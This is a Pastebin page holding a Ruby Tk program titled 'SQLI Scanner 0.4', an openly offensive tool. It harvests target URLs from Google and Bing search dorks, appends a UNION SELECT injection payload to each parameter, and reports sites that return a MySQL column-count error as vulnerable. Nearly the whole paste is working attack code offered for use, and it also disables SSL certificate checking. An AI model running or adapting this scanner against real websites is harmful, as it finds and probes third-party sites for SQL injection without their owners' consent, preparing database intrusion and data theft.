API tools faq
paste
Doddy

SQLI Scanner 0.4 - Scanner Google (Tk)

Doddy
Jan 1st, 2015
583
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 4.77 KB | None | 0 0
raw download clone embed print report
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4. #Scan Google Tk
  5.  
  6. require "tk"
  7. require "open-uri"
  8. require "net/http"
  9. require "openssl"
  10.  
  11. # Functions
  12.  
  13. def toma(web)
  14.     begin
  15.         return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  16.     rescue
  17.         return "Error"
  18.     end
  19. end
  20.  
  21.  
  22. def toma_ssl(web)
  23.     uri = URI.parse(web)
  24.     nave = Net::HTTP.new(uri.host, uri.port)
  25.     nave.use_ssl = true
  26.     nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  27.     return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  28. end
  29.  
  30.  
  31. def tomar(web,arg)
  32.     begin
  33.         headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  34.         uri = URI(web)
  35.         http = Net::HTTP.new(uri.host, uri.port)
  36.         return http.post(uri.path,arg, headers).body
  37.     rescue
  38.         return "Error"
  39.     end
  40. end
  41.  
  42. def cortar(pages)
  43.     final = ""
  44.     finales = []
  45.     pages.flatten.each do |page|
  46.         if page=~/(.*)=(.*)/
  47.             parte1 = $1
  48.             parte2 = $2
  49.             final = parte1 + "="
  50.             finales.push(final)
  51.         end
  52.     end
  53.     return finales
  54. end
  55.  
  56.  
  57. def google(dork,pages)
  58.  
  59.     links = []
  60.     dork = dork.sub(/ /,"+")
  61.     contador = 0
  62.     for i in ("1"..pages)
  63.         contador+=10
  64.         code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  65.         paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  66.         paginas.flatten.each do |pagina|
  67.             partes = pagina
  68.             if partes=~/url\?q=(.*)&amp;sa/
  69.                 parte = $1
  70.                 link = URI::decode(parte)
  71.                 links.push(link)
  72.             end
  73.         end
  74.         end
  75.         links = links.uniq
  76.     return links
  77. end
  78.  
  79. def google_recursive(dork,pages)
  80.     dork = dork.sub(/ /,"+")
  81.     contador = 0
  82.     guardo = []
  83.     for i in ("1"..pages)
  84.         contador+=10
  85.         url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  86.         code = toma_ssl(url)
  87.         links = URI::extract(code)
  88.         links.each do |link|
  89.             if link=~/cache:(.*?):(.*?)\+/
  90.                 link_final = "http://"+$2
  91.                 link_final = URI::decode(link_final)
  92.                 guardo.push(link_final)
  93.             end
  94.         end
  95.     end
  96.     guardo = guardo.uniq
  97.     return guardo
  98. end
  99.  
  100. def bing(dork,pages)
  101.  
  102.     guardo = []
  103.     dork = dork.sub(/ /,"+")
  104.     contador = 0
  105.     for i in ("1"..pages)
  106.         contador+=10
  107.  
  108.         code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  109.  
  110.         links = code.scan(/<h2><a href="(.*?)" h/)
  111.  
  112.         links.flatten.each do |link|
  113.             link_final = URI::decode(link)
  114.             if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  115.                 guardo.push(link_final)
  116.             end
  117.         end
  118.  
  119.         links = code.scan(/<h3><a href="(.*?)" h/)
  120.  
  121.         links.flatten.each do |link|
  122.             link_final = URI::decode(link)
  123.             if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  124.                 guardo.push(link_final)
  125.             end
  126.         end
  127.     end
  128.     guardo = guardo.uniq
  129.     return guardo
  130. end
  131.  
  132. #
  133.  
  134. window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
  135. window['geometry'] = '300x320-20+10'
  136.  
  137. TkLabel.new(window) do
  138.     background "black"
  139.     foreground "green"
  140.     text "    Dork : "
  141.     place('relx'=>"0.1",'rely'=>"0.1")
  142. end
  143.  
  144. dork = TkEntry.new(window){
  145.     background "black"
  146.     foreground "green"
  147.     width 25
  148.     place('relx'=>0.3,'rely'=>0.1)
  149. }
  150.  
  151. TkLabel.new(window) do
  152.     background "black"
  153.     foreground "green"
  154.     text "    Pages : "
  155.     place('relx'=>"0.1",'rely'=>"0.2")
  156. end
  157.  
  158. pages = TkEntry.new(window){
  159.     background "black"
  160.     foreground "green"
  161.     width 25
  162.     place('relx'=>0.3,'rely'=>0.2)
  163. }
  164.  
  165. TkLabel.new(window) do
  166.     background "black"
  167.     foreground "green"
  168.     text "Console"
  169.     place('relx'=>0.4,'rely'=>0.3)
  170. end
  171.  
  172. console =TkText.new(window) do
  173.     background "black"
  174.     foreground "green"
  175.     width 30
  176.     height 9
  177.     place('relx'=>0.1,'rely'=>0.4)
  178. end
  179.  
  180. TkButton.new(window) do
  181.     text "Search"
  182.     background "black"
  183.     foreground "green"
  184.     width 17
  185.     activebackground "green"
  186.     highlightbackground  "green"
  187.     command proc{
  188.    
  189.         dork = dork.value.to_s
  190.         pages = pages.value.to_s
  191.  
  192.         console.insert("end",  "[+] Searching in Google ...\n\n")
  193.        
  194.         links = cortar(google(dork,pages))
  195.  
  196.         if links.count.to_s=="0"
  197.             console.insert("end",  "[+] Searching in Google again ...\n\n")
  198.             links = cortar(google_recursive(dork,pages))
  199.         end
  200.  
  201.         console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
  202.    
  203.         if links.count.to_s=="0"
  204.             console.insert("end", "[-] Links not found")
  205.         end
  206.  
  207.         links.flatten.each do |link|
  208.             console.insert("end", "[+] Link : "+link)
  209.             begin
  210.                 url = toma(link + "-1+union+select+1--")
  211.                 if url=~/The used SELECT statements have a different number of columns/
  212.                     console.insert("end"," [OK]\n\a\a")
  213.                 else
  214.                     console.insert("end"," [FAIL]\n")
  215.                 end
  216.             rescue
  217.                 console.insert("end", " [FAIL]\n")
  218.             end
  219.         end
  220.        
  221.         console.insert("end",  "\n[+] Finished")
  222.        
  223.     }
  224.     place('relx'=>0.3,'rely'=>0.9)
  225. end
  226.  
  227. Tk.mainloop
  228.  
  229. #The End ?
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!